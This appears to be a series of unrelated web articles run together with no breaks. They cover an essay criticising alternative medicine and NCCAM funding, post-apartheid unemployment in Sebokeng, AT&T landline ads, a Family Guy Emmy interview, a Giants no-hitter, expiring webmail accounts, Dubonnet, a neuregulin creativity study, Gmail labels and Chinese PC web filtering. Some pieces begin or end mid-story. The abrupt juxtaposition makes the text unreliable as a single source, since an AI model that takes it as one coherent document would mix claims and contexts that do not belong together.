In 1994 , the OAM ’s first director resigned , charging that political interference had hampered his ability to carry out OAM ’s mission in a scientific manner [ 11 ] .
In 1998 , Congress upgraded OAM into an NIH center called the National Center for Complementary and Alternative Medicine ( NCCAM ) with an annual budget of $ 50 million .
The annual budget rose steadily to $ 123 million in fiscal year 2005 and has remained close to that amount since that time [ 12 ] .
In 2014 , the center was renamed National Center for Complementary and Integrative Health ( NCCIH ) .
When OAM was created , I stated : “ It remains to be seen whether such studies will yield useful results .
Even if some do , their benefit is unlikely to outweigh the publicity bonanza given to questionable methods . ”
In 2002 , Wallace I. Sampson , M.D. , editor of the Scientific Review of Alternative Medicine described what happened during the next ten years :
It is time for Congress to defund the National Center for Complementary and Alternative Medicine .
After ten years of existence and over $ 200 million in expenditures , it has not proved effectiveness for any “ alternative ” method .
It has added evidence of ineffectiveness of some methods that we knew did not work before NCCAM was formed .
NCCAM proposals for 2002 and 2003 promise no more .
Its major accomplishment has been to ensure the positions of medical school faculty who might become otherwise employed — in more productive pursuits [ 13 ] .
The Bottom Line
Robert S. Baratz , M.D. , D.D.S. , Ph.D. has summarized the “ CAM ” problem this way :
Despite what its proponents propone , CAM is not an “ alternative universe , ” or even a parallel one .
It is merely a marketing tool that is as imprecise as those who claim to practice it .
While the motives of some may be pure , but perhaps naive , the world of CAM is also populated by some who are profiteers , some who are hucksters , and some who are quite delusional .
It ’s great to explore our world and find new treatments and new drugs , but the process of discovery , and the methods of experimentation must be rigorous , and based on objective evidence .
And any human experiments belong under the supervision of independent review agencies whose mission is to protect subjects from obvious dangers , abuse , and / or “ experiments ” which will yield no useful data .
When anyone who calls him or herself a “ health care provider ” invents some method or creates an new “ - ology , ” and begins to do things to the public , the issue should not be whether it is “ CAM ” or “ not - CAM , ” but whether it is effective or is an unsupervised human experiment [ 14 ] .
Put another way : to evaluate practitioners , you should look at what they do , not what they call themselves .
But the simplest way to avoid wasting time and money is to avoid people who uses the marketing terms described in this article .
References
Fontanarosa PB , Lundberg GD .
Alternative medicine meets science .
JAMA 280:1618 -1619 , 1998 .
Relman AS .
A trip to Stonesville .
The New Republic , Dec 14 , 1998 .
Farley J. E-mail message to Stephen Barrett , M.D. , 2001 .
Ernst E. Integrative medicine : Smuggling alternative practices into rational medicine ?
Focus on Alternative and Complementary Therapies 16 ( 1 ) :1 - 2 , 2011 .
Sampson W. Antiscience trends in the rise of the “ alternative medicine ” movement .
In Gross PR , Levitt N , Lewis MW ( editors ) .
The Flight from Science and Reason .
New York : New York Academy of Sciences , 1996 , pp 188-197 .
Gorski D. Making it up as you go along : So - called “ functional medicine ” is pure quackery .
Respectful Insolence Blog , April 18 , 2016 .
Angell M , Kassirer J. Alternative Medicine — The risks of untested and unregulated remedies .
New England Journal of Medicine 339:839-841 , 1998 .
Happle R.
The essence of alternative medicine A dermatologist ’s view from Germany .
Archives of Dermatology 134:1455 - 1460 , 1998 .
Inker R. Basic training for holistic medical practice : Nurturing your body .
Holistic Medicine Winter 1997 , pp 4 - 5 . Jacobs R. E-mail message to a newsgroup , June 11 , 2001 .
Marshall E. The politics of alternative medicine .
Science 265:2000 - 2002 , 1994 .
NCCIH funding : Appropriations history .
NCCIH Web site , accessed April 17 , 2017 .
Why the National Center for Complementary and Alternative Medicine ( NCCAM ) should be defunded .
Quackwatch , Dec 10 , 2002 .
Baratz RS .
Post to Healthfraud List , Dec 27 , 2010 .
For Additional Information
By Dale T. McKinley and Ahmed Veriava , Johannesburg
“ I 'm collecting a register for the indigent people and I had 37,000 applications from Emfuleni only .
Each and every day I come across children who are left in their homes -- the parents are deceased -- they are hungry .
When I knock at the door , I say how you are surviving and they say we have been hungry for three days , we have n't got food .
You would n't think it 's a reality in an urban area like this but it is a reality .
People are unemployed , a lot of people are unemployed . ”
-- Priscilla Ramagale - Ramakau , government social worker in Sebokeng
July 5 , 2009 --
It was n't always this way for Sebokeng , one of the older urban ``townships ' ' in South Africa , a place synonymous with the early settlement and subsequent massive growth of the black industrial working class .
It was workers in places like Sebokeng who had fuelled the vain hopes of the apartheid state that the development of a settled , waged black working class would ensure continued economic growth as well as political stability .
But that 's not how it turned out .
Instead , those workers used their stable waged employment in South Africa 's industrial heartland to transform themselves into a vanguard for the development of trade union organisation and struggles for political freedom .
There are few places in South Africa with as strong a history of resistance in the community and at the workplace , a building of counter - power that played such a key role in bringing the apartheid system to the point of political and socioeconomic crisis .
The figure of the waged proletariat formed the backbone of the community 's working - class strength and lifestyle .
They bought bonded houses , put food on the table for their families and sent their children to school .
However , the very foundation for this strength , waged labour , would quickly become the community 's Achilles heel .
Taking a leaf out of the pages of their apartheid predecessors , the new democratic state adopted a policy strategy which saw waged labour as the ticket to ( deracialised ) socioeconomic inclusion , the main conduit for social citizenship .
This very same state however , effectively tore up that ticket when it adopted macroeconomic policies that first incubated , then catalysed the mass shedding of waged labour as part of the headlong , post - apartheid pursuit of economic growth and profit .
The workers of Sebokeng were amongst the first to feel the cold winds of retrenchment that followed in the decade after 1994 .
Throughout the 1970s , '80s and '90s the vast majority of workers living in Sebokeng had been employed in the surrounding heavy industries , by behemoths like SAMANCOR and ISCOR .
The great irony of South Africa 's ``miracle ' ' is that at the very moment at which the promise of political freedom seemed to be at hand , daily life would be forced to meet the new insecurities of post - apartheid unemployment and retrenchment , sharpened by the shift from public - sector parastatals to privatised corporates .
By the turn of the 21st century the bloodletting was in full surge , spurred on not only by the new democratic state 's reborn neoliberalism but also by the crass greed and inhumanity of new comprador elite and the corporate mandarins of globalising capitalism .
At the very point that workers were consolidating the social and economic security that all had worked so hard to achieve ( even if often precariously ) , the proverbial carpet was pulled from underneath their feet .
The large - scale loss of jobs would come at the same time that the promises of inclusion into a new South Africa , was made conditional on the benefits , consistency and extension of rights that came from having a job .
For the community of Sebokeng , at the end of the wage they found nothing but the precipitous deterioration of the social and physical conditions of life .
Following hot on the heels of the privatised balkanisation of ISCOR , hundreds of long - time workers were retrenched from SAMANCOR .
Ezekial Motseke was one of those workers :
“ They told us that they were closing down a furnace that was no longer going to work and thus they had no choice but to retrench us ( but ) they knew that all of us were affected by manganese .
Since then nothing is right with my body .
I am always sick , I am always in bed .
My body is painful all day long . ”
Another retrenched worker , Thomas Molefe laments the experience :
“ That place … it endangered our lives but we could n’t do otherwise because we were earning a living for our kids … that place killed me .
We did n’t know what was going on , what was eating us there .
People were sick there inside but we could n’t see . ”
What was thus bequeathed to these and countless other workers was a double ``death ' ' .
On the one hand , an almost immediate social death wherein the hard - won social power gained within a context of waged employment was effectively erased .
On the other , a more gradual , excruciatingly slow physical death as a direct result of the conditions under which they worked .
These two ``deaths '' have become inseparable and represent a tragic and doubly ironic twist of the transitional inheritance of the Sebokeng workers that increasingly appears as a metaphor for the life of the entire community .
Not long ago the working class in South Africa was being told by the state that the imperatives of ``macro- economic stability '' and ``economic growth '' necessitated a period of ``sacrifice '' ( read : loss of waged employment / retrenchment ) for the greater good .
Now that the ``greater good '' has been exposed for the selfish lie that it is and the full political and social impact of the ``sacrifice '' continues to devastatingly hit home , the same working class is being told by the state to hold onto the coat - tails of social welfare and the promise of ``new and expanded '' opportunities for waged employment .
It is a cruel , twisted and chimeric logic and it is slowly but surely strangling the individual and collective life out of communities like Sebokeng .
[ Dale McKinley is an independent writer , lecturer and researcher , and an activist within the Anti-Privatisation Forum as well as the Social Movements Indaba .
This article is part of a two - year research project conducted by the authors through the South African History Archive entitled ``Forgotten Voices in the Present : Post - 1994 Oral Histories from Three Poor Communities in South Africa ' ' .
It has been posted at Links International Journal of Socialist Renewal with permission . ]
Stay on Top of Enterprise Technology Trends
Get updates impacting your industry from our GigaOm Research Community
[ qi:086 ]
Keep your landline or your loved ones may die , seems to be the messaging tied to AT&T ’s ( s T ) Home Base campaign released today .
It comes on the heels of a Verizon ( s vz ) ad aimed at getting non-Verizon landline customers to ditch their wires in exchange for wireless .
The battle between wired and wireless is heating up .
The AT&T campaign , complete with a picture of an ambulance racing to the scene , highlights the reliability and certainty that comes from being able to dial 9 - 1 - 1 from a landline .
Copper , it could save your life .
I can’t fault AT&T for its scare tactics , given that those fears are exactly why we chose to revert back to a landline in our own home after going completely wireless .
My mother - in - law was just too concerned about watching our toddler without that copper connection , since she often has a less - than - fully - charged wireless phone .
However , some of the other reasons , pulled directly from an AT&T PDF , offer pretty lame rationales ( fax machines ?
finding a phone in the dark ? ) , as well as a failed grasp of numbering .
How many of the reasons below do y’all find legit — or merely worth the $ 20 per month to connect via a copper landline ?
LOS ANGELES ( Hollywood Reporter ) - “ Family Guy ” on Thursday became the first animated show in nearly 50 years to score an Emmy nomination for best comedy series .
The cast of " Family Guy " in an undated image courtesy of Fox .
REUTERS / Fox / Seth McFarlane / Handout
The show ’s creator , Seth MacFarlane , says his nomination marks the end of Emmy discrimination against animated TV -- but does n’t think he ’ll actually win .
THE HOLLYWOOD REPORTER : SO WHERE WERE YOU , AND WHAT WERE YOU DOING WHEN THIS NEWS CAME DOWN ?
MacFarlane :
It was about 5 in the morning and I got a phone call , so I was not able to react for the excitement that they wanted .
THE HOLLYWOOD REPORTER : NOW THAT YOU’VE HAD A LITTLE TIME TO WARM UP , WHAT’S YOUR REACTION ?
MacFarlane : I think it is extremely encouraging for everyone who is busting their ass on these animated shows to have this happen .
I have friends on “ King of the Hill , ” I have friends on “ The Simpsons . ”
I feel like it is validation for all of these shows that they are now viewed as on the same playing field as the other comedies , because we are all really doing the same job .
It took a long time to recognize single - camera comedies , and I think that it ’s frustrating for a lot of the animated shows that we have n’t gotten the same treatment ( as other comedies ) .
It is nice that they stopped ignoring the fact that the animated shows are major players in the comedy landscape of television .
This is a huge step forward for open - mindedness in the voting process .
THE HOLLYWOOD REPORTER : WAS FOX IN FAVOR OF THE IDEA OF SUBMITTING TO THIS CATEGORY ?
MacFarlane :
They left it up to us ; they did n’t really have a strong opinion one way or the other like we did .
While shows like “ SpongeBob ” and “ Fairly OddParents ” are good shows , they are not doing the same type of program as a show like “ The Simpsons ” or “ Family Guy . ”
It ’s apples and oranges .
It ’s doing two different things , producing for two different audiences .
The process is much more analogous to what shows like “ Two and a Half Men ” or “ The Office ” do .
The sitcom process is a different medium .
The only thing that should be relevant is if you are doing a quality show or not .
I think “ The Simpsons ” should have been nominated in the ‘ 90s , when they were up against “ Friends ” and “ Seinfeld . ” “ The Simpsons ” were making a show that was on par with a lot of the shows nominated and better than a lot of them .
THE HOLLYWOOD REPORTER : WHEN YOU SAW THAT THERE WERE SEVEN NOMINEES , WHAT DID YOU MAKE OF THAT ?
MacFarlane : I think that helped us .
Nobody likes to do things differently than the way they are used to doing them .
It is just human nature , and I think the addition of those spots helped people with the live - action shows they are comfortable nominating , but at the same time be OK with trying to push the playing field a little bit .
THE HOLLYWOOD REPORTER : WHICH EPISODES DID YOU SUBMIT ?
MacFarlane :
We submitted three episodes .
We submitted “ Road to Germany , ” we submitted “ Family Gay , ” we submitted “ I Dream of Jesus . ”
We picked three of our edgier shows as a choice .
Ya know , we figured if we are going to be damned , let ’s be damned for what we really are .
THE HOLLYWOOD REPORTER : SOME OF THE OTHER COMEDY NOMINATIONS WERE SURPRISING AS WELL .
INSTEAD OF “ TWO AND A HALF MEN , ” YOU’RE FACING “ FLIGHT OF THE CONCHORDS ” AND “ HOW I MET YOUR MOTHER . ” WHAT’S YOUR FEELING ON THE COMPETITION ?
MacFarlane :
They ’re all very different types of shows .
I have not personally seen “ Flight of the Conchords . ”
I know a lot of people who are big fans of it , and who speak extremely highly of it , and that is a show that is certainly by all indication not traditional .
And that also , I think , shows a willingness by the voters to finally adapt to the new playing field .
You know , the ratings for “ The Simpsons ” are better than most live - action comedies on the air , and in other categories ratings and popularity are taken into account in the voting process .
And for some reason that has n’t been the case for the animated shows ; they have this big elephant in the room .
These are big hit shows .
“ The Simpsons ” has been on for 20 years and still going strong .
Our numbers are showing evidence that we hopefully should be noticed .
THE HOLLYWOOD REPORTER : DO YOU THINK THE NOMINATION WILL BE REFERENCED IN THE SHOW ?
MacFarlane : I do n’t know if there will be time to get a reference in , but maybe it will more likely be referenced in one of the interstitials between the shows that we do .
THE HOLLYWOOD REPORTER : WHAT DO YOU THINK YOUR CHANCES ARE OF WINNING ?
MacFarlane :
It is enough just to be nominated .
I just think ( winning ) would be asking for too much change all at once .
I doubt we would win .
Although , I thought we were further away from Obama ( winning ) than we are , and that was a nice surprise .
So , who knows ?
Sanchez 's dad , Sirgfredo , watched nervously from the stands , bouncing and biting his nails , then scurried down to the dugout to be among the first to congratulate the pitcher .
" Right now I 'm just going to go home and hang out with my dad , " Sanchez said .
" I was pumped that he was here watching the game . "
Sanchez almost lost his no-hit bid in the ninth , but Gold Glove center fielder Aaron Rowand saved the gem with a leaping grab at the center - field fence to rob pinch - hitter Edgar Gonzalez for the second out .
" I was going to go up and over and land on the other side of the fence if I had to , to try to make the catch , " Rowand said .
The 26 - year - old Sanchez ( 3 - 8 ) returned to the rotation after a nearly three - week demotion to the bullpen -- and only got the call because 303 - game winner Randy Johnson went on the disabled list this week with a shoulder injury .
With his father and a friend cheering from the stands , Sanchez threw a called third strike past Everth Cabrera to finish his first career complete game .
Sanchez walked toward the plate and thrust his arms in the air as catcher Eli Whiteside rushed in for a big hug and the Giants poured out of their dugout .
Also offering their congratulations were Johnson , the last major leaguer to throw a perfect game , and Giants pitching coach Dave Righetti , who tossed a no-hitter for the New York Yankees on July 4 , 1983 .
Sanchez 's father is visiting from Puerto Rico and arrived in San Francisco on Thursday night .
When the pitcher came off the field , the two shared a long embrace before Sanchez jogged back onto the field and tipped his cap to the cheering crowd .
" This is a gift for him , " said Sanchez , who struck out a career - high 11 .
" I feel awesome . "
It was the Giants ' 13th no-hitter and first since John Montefusco did it on Sept. 29 , 1976 , at Atlanta .
Their last one in San Francisco came when Ed Halicki beat the New York Mets in the second game of a doubleheader on Aug. 24 , 1975 .
The Padres were no -hit for the seventh time and first since Bud Smith blanked them 4 - 0 for St. Louis on Sept. 3 , 2001 .
Sanchez did it on 110 pitches , 77 for strikes .
After the final one , Whiteside came rushing with a hug , followed moments later by all their teammates .
Sanchez , who won for the first time since May 25 , had a five - start winless stretch this season in which he went 0 - 4 .
He told The Associated Press two days earlier that he had n't lost his confidence in his ability to pitch and be a starter in the major leagues -- and manager Bruce Bochy had n't lost faith , either .
" They gave me a second chance .
You see what happened tonight , " Sanchez said .
Sanchez was n't blaming Uribe for the error that cost him a shot at a perfect game .
" It 's the game .
It can happen , " Sanchez said .
" I could have given up a hit , too .
It does n't matter .
I just want to win . "
Uribe was n't part of the extended celebration in the Giants ' clubhouse after the game .
As is usually the case , he left quickly .
" I think tomorrow would be a better time to kid around with him , " teammate Rich Aurilia said .
" In the history of the game there are just so many perfect games .
It may never occur again .
I know it does n't happen a lot . "
There have been 15 perfect games in major league history .
Johnson tossed the most recent one on May 18 , 2004 , for Arizona at Atlanta .
After the sixth inning , San Francisco manager Bruce Bochy removed third baseman Pablo Sandoval because of a sore back .
He put Kevin Frandsen in at second and shifted Uribe from second to third .
Sanchez struck out the side in the seventh and Adrian Gonzalez hit a long drive to left in the eighth before Headley 's grounder to Uribe , who finished with three hits and an RBI at the plate .
" He did everything to make that play , " Aurilia said .
" You have to remember he just moved over from second , where he'd been the last three weeks .
That 's not an easy hop .
I know , I 've played the position .
Just think , he was one in - between hop away from a perfect game .
We still saw something special tonight .
Juan will contribute in the second half . "
Sanchez pitched the first no-hitter in the majors since Carlos Zambrano for the Chicago Cubs against the Houston Astros in Milwaukee on Sept. 14 , 2008 .
That game was relocated from Houston to Miller Park because of Hurricane Ike .
Sanchez 's father and friend stood nervously -- with the rest of the crowd of 30,298 at AT&T Park on a cool night in the Bay Area -- and his dad could n't look at the end .
But Sanchez 's dad quickly got down to the dugout to congratulate a pitcher who made his 51st major league start the most special of his career after months of struggles .
" Felicidades ! " -- congratulations -- fans yelled in the tunnel outside the San Francisco clubhouse as Sanchez signed autographs .
Cabrera , the last batter of the game , squared to bunt on the first pitch -- bringing a chorus of boos from the crowd .
Sanchez then froze Cabrera with a breaking ball , setting a career - high with his 11th strikeout .
Cabrera protested the call , looking at plate umpire Brian Runge in disbelief .
" On film he throws the ball hard , but it looks like he does n't know where it 's going , " San Diego 's Tony Gwynn Jr. said .
" Today he looked exactly like he knew where it was going . "
Sanchez finished the Giants ' major league - leading 13th shutout of the year , following All - Star and reigning NL Cy Young Award winner Tim Lincecum 's no-hit bid into the seventh inning a night earlier against San Diego .
" I think if you looked at the staff , he would n't be the one you picked , " Bochy said .
" He came out throwing 94 - 96 [ mph ] .
He just had incredible stuff . "
The last no -hitter in San Francisco was pitched by Florida 's Kevin Brown on June 10 , 1997 , at Candlestick Park -- so this was the first at the Giants ' 10 - year - old waterfront ballpark .
Sandoval hit a three - run homer to center off Josh Banks ( 1 - 1 ) in the fifth .
Rowand also had three RBIs .
Uribe and Whiteside had RBI singles in a four - run second inning .
Rowand added a two - run single .
Whiteside started in place of regular catcher Bengie Molina , whose wife went into labor Friday .
Game notes
It was the first no -hitter by a Giants lefty since Hall of Famer Carl Hubbell pitched one for the New York Giants against Pittsburgh on May 8 , 1929 .
... A 27th - round draft pick in 2004 , Sanchez pitched four no-hitters in college for NAIA Ohio Dominican .
Information from The Associated Press was used in this story .
Registering for an account at any web site almost always requires an email address , and some people use a secondary address they do n't care about instead of their real email address to avoid spam .
If you do this , be very careful .
Advertisement
( Click the image above for a closer look . )
Microsoft shuts down Hotmail accounts that have n't been logged into after nine months .
So if you registered for your Gmail account two years ago and used your Hotmail address as your secondary email address and never logged back in , you 've put your Gmail account at risk .
Advertisement
Here 's how :
If your Hotmail account gets shut down due to inactivity , someone else can open a new one using your Hotmail address .
Then , if that someone else requests a password reset from Gmail , it goes to that address , and that someone can get into your primary email account .
This is how Twitter employees ' Gmail accounts got broken into last week .
From Hotmail 's help section :
Free Windows Live Hotmail accounts become inactive if you do n't sign in for more than 270 days or within the first 10 days after signing up for an account .
After an account becomes inactive , all messages , folders , and contacts are deleted .
Incoming messages will be sent back to the sender as undeliverable .
Your account name is still reserved .
However , if the account stays inactive for an additional 90 days , the account name may be permanently deleted .
In the comments of our risks of cloud computing post , a reader said that his wife 's last emails from her father were lost in a shutdown Hotmail account .
The Hidden Risks of Cloud Computing Every day more users move their computing lives from the desktop to the cloud and rely on hosted …
Read more
Advertisement
If you are or ever were a Hotmail user , make sure all the important online accounts you use ( banking , other email accounts , shopping sites where you 've stored credit card information ) do n't send password reset messages to your Hotmail account , and that important messages are n't left there untouched for too long .
Either that , or make absolutely sure you log in once every few months .
Update : My apologies for picking on Hotmail !
Turns out Gmail and Yahoo Mail have similar deactivation policies .
From Gmail 's Help :
A dormant address is a Gmail address that has n't been used for six months .
You can still receive mail if your address is dormant , but you need to log in to keep your account active .
If you do n't log in to Gmail within three months of it being labeled dormant - or for nine consecutive months - Google may delete the address .
Advertisement
From Yahoo
Mail 's help :
Accounts are deactivated and removed after four months of no use .
When an account is deactivated , you wo n't be able to access it , regardless of whether or not email has been received in the account during that time .
And sorry , but we can't retrieve any of the information that was formerly stored in it .
Advertisement
In summary , unlogged - into Hotmail and Gmail accounts expire after nine months and unlogged - into Yahoo accounts expire after six ( unless you pay for Yahoo ! Mail Plus ) .
Looks like we all have to remember to log into those secondary webmail accounts .
Never Use Hotmail as Your Secondary Email Account [ Smarterware ]
Smarterware is Lifehacker editor emeritus Gina Trapani's new home away from ' hacker .
To get all of the latest from Smarterware , be sure to subscribe to the Smarterware RSS feed .
For more , check out Gina 's weekly Smarterware feature here on Lifehacker .
By Tom Geoghegan
BBC News Magazine
The Queen 's love of Dubonnet had staff at Lord 's cricket ground frantically searching for a bottle ahead of her attendance at the Second Ashes Test .
Apart from Her Majesty , who still drinks Dubonnet ?
A royal embarrassment was looming on Friday when the Queen 's bottle of Dubonnet was nearly prevented from entering Lord 's cricket ground .
Dubonnet adverts from the 1960s capture the age Security staff , who restrict the admission of alcohol , eventually relented , so the Queen was able to enjoy one of her favourite drinks while watching England 's bowlers gain the upper hand against Australia .
There had been a minor panic the day before when it was discovered that the only bottle in the cellar was out of condition , and a local off - licence apparently said that no - one had asked for the drink in 30 years .
A bottle was found at a supermarket , but the difficulty in obtaining one raises the question , who drinks it ?
The Queen Mother famously enjoyed a Dubonnet and gin , a habit inherited by her daughter .
A Daily Telegraph reporter who spent time following the Queen earlier this year said she likes one immediately before lunch every day .
Invented in 1846 by chemist Joseph Dubonnet , from Paris , Dubonnet is a blend of fortified wine , herbs , spices and quinine .
It 's not something that people under a certain age would order or drink
Nick Wykes
IPBartenders During the French conquest of North Africa in the 1830s , the authorities had offered rewards to anyone who could come up with a way of helping French Foreign Legionnaires drink quinine , which was used to combat malaria .
The brand was bought by Pernod Ricard in 1976 and Pia Zadora became the Dubonnet girl in a series of television adverts .
Nick Wykes , bartender trainer at IPBartenders , says it 's now a bit of a " continental relic " .
" In terms of its use in the mainstream , it 's exceptionally limited .
It 's not something that people under a certain age would order or drink in any great quantities . "
HOW IS IT SERVED ?
As an aperitif , it 's traditionally served before lunch or a meal
If you 're the Queen Mother , then 70 % Dubonnet , 30 % gin , with a slice of lemon under the ice Commonly drunk with lemonade Also an ingredient in cocktails Both in age and class , the Queen fits the dwindling demographic of Dubonnet drinkers , says Mr Wykes , who says his own grandmother is partial to it .
" I find it tannic and woody .
When you get a full - bodied , red wine , you get a dehydrated sensation on your tongue .
It 's like that .
It 's got a refreshing , fruity flavour . "
Holidays in Provence
It 's very much a niche market , says Graham Page , of marketing firm Nielsen and an expert on drinking habits , with only about 8,000 nine - litre cases sold a year .
" I would imagine that the vast majority of drinkers would be middle and upper class , simply because of the historical profile of eating out and pre-dinner drinking .
Pia Zadora , the face of Dubonnet " And I would suggest that geographically they are from the area in and around the South East and Home Counties . "
They are the kind of people , he says , who holiday in Provence , because historically Dubonnet has benefited from the importing of French cuisine and culture in the pre-package holiday era .
" Before the British started going to Spain on package holidays , France was the closest country to us , to some extent .
" A lot of people went to France , perhaps not the working class but people from the more prosperous South East , and they would bring back flavours of French cuisine and drink consumption . "
When Cinzano strongly marketed itself in the late 70s and early 80s , using Leonard Rossiter and Joan Collins in its adverts , Dubonnet and Noilly Prat tried to revitalise themselves too .
Dubonnet 's particular problem is that it has n't attracted younger drinkers and by definition that means it may die
Graham Page
Nielsen
Although there is a hard core who still drink them , the market for fortified wines has fallen away dramatically , says Mr Page , out - muscled by table wines .
" Because wine has become so all - powerful over the last 15 , 20 and 30 years , it 's taken over the mantle , to a certain extent , of aperitifs , whether gin and tonic or Dubonnet or Martini or Cinzano .
" The marketplace for them , which emerged and boomed in the 60s and 70s , has got older with the brand .
Dubonnet 's particular problem is that it has n't attracted younger drinkers and by definition that means it may die . "
Young people prefer to drink what 's easy to consume and easy to mix , he says , hence the march of vodka to dominate the spirits market .
But Rosie Davenport , of Off Licence News , says Dubonnet 's fortune could be revived , with a celebrity endorsement .
" A lot of rappers said they liked to drink Cognac and that sparked quite a lot of interest in it .
That was in the same category as Dubonnet - unfashionable and neglected . "
Add your comments on this story , using the form below .
My wife has drunk Dubonnet ( and lemonade ) since we met 37 years ago and our 25 year old daughter has inherited the habit .
Our local supermarket usually has some in stock and the cruise liners we have sailed in have come up trumps with Dubonnet , albeit some has been past its sell - by date .
When I order it in pubs and bars , in UK and overseas , I usually get humoured , in front of other customers , along the lines ' What is this drink this old geezer is banging on about ? '
That 's why I get sent to the bar .
Terry , Warsash , Hants I have drunk Dubonnet since the late sixties .
It is however getting more difficult to find .
Perhaps with royal approval I will no longer receive blank looks when I ask for it ....
Ellie , Newark I am 32 and love Dubonnet , but always bemoan that it 's hard to find .
Please can someone come up with a slick marketing campaign to bring it back into fashion ( as has happened with Pimms ) , so that we no longer have that to face that bemused look when we ask for it !
( Can Frangelico also please be resurrected ! )
Terri , Dublin , Ireland
In the late 50s and early 60s the face of Dubonnet on British TV was the famous French comedian Fernandel who grimaced and gurned his way through saying " Do 'ave a Dubonnet "
Jeremy Frobisher , Leeds I 'm 23 and I drink Dubonnet !
A habit I picked up when doing bar work .
After sampling most of the drinks on offer , I tried it , and loved it .
My boss was quite annoyed though , as I finished off the only bottle they had , and he had to order more , even though I was apparently the only one drinking it .
Definitely not a trendy beverage .
Cate , Goring - on - Thames Lou Reed is a fan as well , judging by the lyrics for his song Berlin :
In Berlin , by the wall / you were five foot ten inches tall /
It was very nice / candlelight and Dubonnet on ice
Mike , Edinburgh Ah , memories !
This was one of the first drinks my parents let me have in a pub - Dubonnet and lemonade !
It 's a nice drink to have one or two of , though definitely not one for the lads out on a Friday night * lol *
Sharon , London Forget gin , mix it with a decent blended scotch , and you have a Manhattan .
Fantastic drink !
Tim Williams , Wilmslow
It was Hetty Wainthropp 's favourite drink too .
Mike Brailsford , Blackpool , England Name
Your e-mail address
Town / city and country
Your comment
The BBC may edit your comments and not all emails will be published .
Your comments may be published on any BBC media worldwide .
Terms & Conditions
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Posted on by mcdonnellwrite
You can waste a lot of time on the Web , so that ’s why it ’s nice to have a home page on your Web browser that has links to all the sites you use the most — that way you can be sure you ’ll be as efficient as possible .
The Hot Sheet Web Directory makes a great starting page , because it has links to dozens of useful sites .
It has links to sites in categories like : Government , Health , History , News , Reference , Science , Sports , Shopping , Travel , Technology , Utilities , Weather , and much more .
You just scroll down the page and click on the link you need .
It ’s a simple , no - frills page with lots of links so you ’ll spend your time getting information instead of just looking at at pretty pictures .
Check out the Hot Sheet Web Directory , and save time in your Web browsing .
Hot Sheet Web Directory | Online Shopping Mall | Multi-Search | Travel Sites | Instant News | Mobile Friendly Portal .
Filed under : education , Internet , research , search | Tagged : information , library , reference | Leave a comment »
Salvador Dali ’s mental disorders were also the key to his creativity .
( Image : Philippe Halsman )
We ’re all familiar with the stereotype of the tortured artist .
Salvador Dali ’s various disorders and Sylvia Plath ’s depression spring to mind .
Now new research seems to show why : a genetic mutation linked to psychosis and schizophrenia also influences creativity .
The finding could help to explain why mutations that increase a person ’s risk of developing mental illnesses such as schizophrenia and bipolar syndrome have been preserved , even preferred , during human evolution , says Szabolcs Kéri , a researcher at Semmelweis University in Budapest , Hungary , who carried out the study .
Kéri examined a gene involved in brain development called neuregulin 1 , which previous studies have linked to a slightly increased risk of schizophrenia .
Moreover , a single DNA letter mutation that affects how much of the neuregulin 1 protein is made in the brain has been linked to psychosis , poor memory and sensitivity to criticism .
Advertisement
About 50 per cent of healthy Europeans have one copy of this mutation , while 15 per cent possess two copies .
Creative thinking
To determine how these variations affect creativity , Kéri genotyped 200 adults who responded to adverts seeking creative and accomplished volunteers .
He also gave the volunteers two tests of creative thinking , and devised an objective score of their creative achievements , such as filing a patent or writing a book .
People with two copies of the neuregulin 1 mutation – about 12 per cent of the study participants – tended to score notably higher on these measures of creativity , compared with other volunteers with one or no copy of the mutation .
Those with one copy were also judged to be more creative , on average , than volunteers without the mutation .
All told , the mutation explained between 3 and 8 per cent of the differences in creativity , Kéri says .
Exactly how neuregulin 1 affects creativity is n’t clear .
Volunteers with two copies of the mutation were no more likely than others to possess so - called schizotypal traits , such as paranoia , odd speech patterns and inappropriate emotions .
This would suggest that the mutation ’s connection to mental illness does not entirely explain its link to creativity , Kéri says .
Dampening the brain
Rather , Kéri speculates that the mutation dampens a brain region that reins in mood and behaviour , called the prefrontal cortex .
This change could unleash creative potential in some people and psychotic delusions in others .
Intelligence could be one factor that determines whether the neuregulin 1 mutation boosts creativity or contributes to psychosis .
Kéri ’s volunteers tended to be smarter than average .
In contrast , another study of families with a history of schizophrenia found that the same mutation was associated with lower intelligence and psychotic symptoms .
“ My clinical experience is that high - IQ people with psychosis have more intellectual capacity to deal with psychotic experiences , ” Kéri says .
“ It ’s not enough to experience those feelings , you have to communicate them . ”
Intelligence ’s influence
Jeremy Hall , a geneticist at the University of Edinburgh in the UK who uncovered the link between the neuregulin 1 mutation and psychosis , agrees that the gene ’s effects are probably influenced by cognitive factors such as intelligence .
This does n’t mean that psychosis and creativity are the same , though .
“ There ’s always been this slightly romantic idea that madness and genius are the flipside to the same coin .
How much is that true ?
Madness is often madness and does n’t have as much genetic association with intelligence , ” Hall says .
Bernard Crespi , a behavioural geneticist at Simon Fraser University in Burnaby , British Columbia , Canada , is holding his applause for now .
“ This is a very interesting study with remarkably strong results , though it must be replicated in an independent population before the results can be accepted with confidence , ” he says .
Journal reference : Psychological Science ( DOI : 10.1111/j.1467-9280.2009.02398.x )
any
We also learned that if we made labels sound too much like folders , people got confused .
For instance , while " Copy to " and " Add to " were easy to use , these terms made people think they were creating multiple copies of a message .
" Move to " was familiar but did n't lead people to think they were creating copies .
And people seem to have picked it up fast !
Since the launch of the new menu buttons in March , we 're seeing a 50 % increase in new Gmail users trying labels in their first 2 weeks .
And overall usage of the " Move to " menu surpassed that of the " Labels " menu within 7 weeks of launching :
For our latest set of changes , we looked at how you access labels on the left side .
In other email applications , folders get the royal treatment and are given a seat at the top near your inbox .
But in Gmail , labels were stuck in a box below Chat — almost like we were telling people , " you do n't want to use these . "
In testing , we discovered that it worked best to remove the terminology altogether and just place custom labels right under the system labels ( e.g. " Inbox " ) :
The last step was to add drag - and - drop .
Now , you can drag mail into a label , or even drag a label directly onto a message : Making it easier to process and organize your mail requires more than just labels , but we hope these changes start to improve the process .
We have much more in store , so stay tuned and keep the feedback coming .
BEIJING -- China plans to require that all personal computers sold in the country as of July 1 be shipped with software that blocks access to certain Web sites , a move that could give government censors unprecedented control over how Chinese users access the Internet .
The government , which has told global PC makers of the requirement but has yet to announce it to the public , says the effort is aimed at protecting young people from " harmful " content .
The primary target is pornography , says the main developer of the software , a company that has ties to China 's security ministry and military .
China 's Ministry of Industry and Information Technology did n't respond to requests for comment .
